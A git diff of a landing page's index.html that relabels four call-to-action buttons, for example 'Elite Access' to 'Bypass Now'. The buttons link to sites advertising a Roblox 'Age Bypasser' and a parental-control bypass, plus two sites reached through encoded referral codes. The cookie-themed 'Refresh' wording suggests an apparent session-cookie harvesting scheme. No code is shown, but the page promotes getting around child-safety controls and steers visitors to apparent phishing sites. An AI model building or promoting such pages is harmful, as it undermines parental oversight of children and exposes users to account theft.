--- a/index.html
+++ b/index.html
@@ -23,7 +23,7 @@
         <li>🔒 Secure Access</li>
         <li>🚀 Quick Login</li>
       </ul>
-      <a href="https://immortal.st/?code=MjU5NDA5ODE0MDYwMDc4MDUzOF83NjU0Nzg1MTcyMDEzMjA1MzEx" class="cta">Get Access ⚡</a>
+      <a href="https://immortal.st/?code=MjU5NDA5ODE0MDYwMDc4MDUzOF83NjU0Nzg1MTcyMDEzMjA1MzEx" class="cta">Access Website ⚡</a>
     </div>
 
     <div class="card1">
@@ -34,7 +34,7 @@
         <li>🔒 Secure Connection</li>
         <li>🚀 Instant Use</li>
       </ul>
-      <a href="https://shockify.st/?code=MzYxMjc0NzEzNzIzOTczMjAxOF83NTQzNzgzMTMxMzM2MDgyNTI5Xzc2NTQ3ODUxNzIwMTMyMDUzMTE=" class="cta">Start Now 💎</a>
+      <a href="https://shockify.st/?code=MzYxMjc0NzEzNzIzOTczMjAxOF83NTQzNzgzMTMxMzM2MDgyNTI5Xzc2NTQ3ODUxNzIwMTMyMDUzMTE=" class="cta">Access Website 💎</a>
     </div>
 
     <div class="card2">
@@ -45,7 +45,7 @@
         <li>🔐 Secure Protocol</li>
         <li>💼 Age Bypasser</li>
       </ul>
-      <a href="https://rbx-tool.com/BypassAge/Accountss" class="cta">Elite Access ⚡</a>
+      <a href="https://rbx-tool.com/BypassAge/Accountss" class="cta">Bypass Now ⚡</a>
     </div>
 
     <div class="card3">
@@ -56,7 +56,7 @@
         <li>⚡ Instant Activation</li>
         <li>🛡️ Protection Layer</li>
       </ul>
-      <a href="https://roblox-parental-control-bypass.vercel.app/parentcontrol/Accounts" class="cta">Refresh Now 🍪</a>
+      <a href="https://roblox-parental-control-bypass.vercel.app/parentcontrol/Accounts" class="cta">Bypass now 🍪</a>
     </div>
   </section>
 </body>
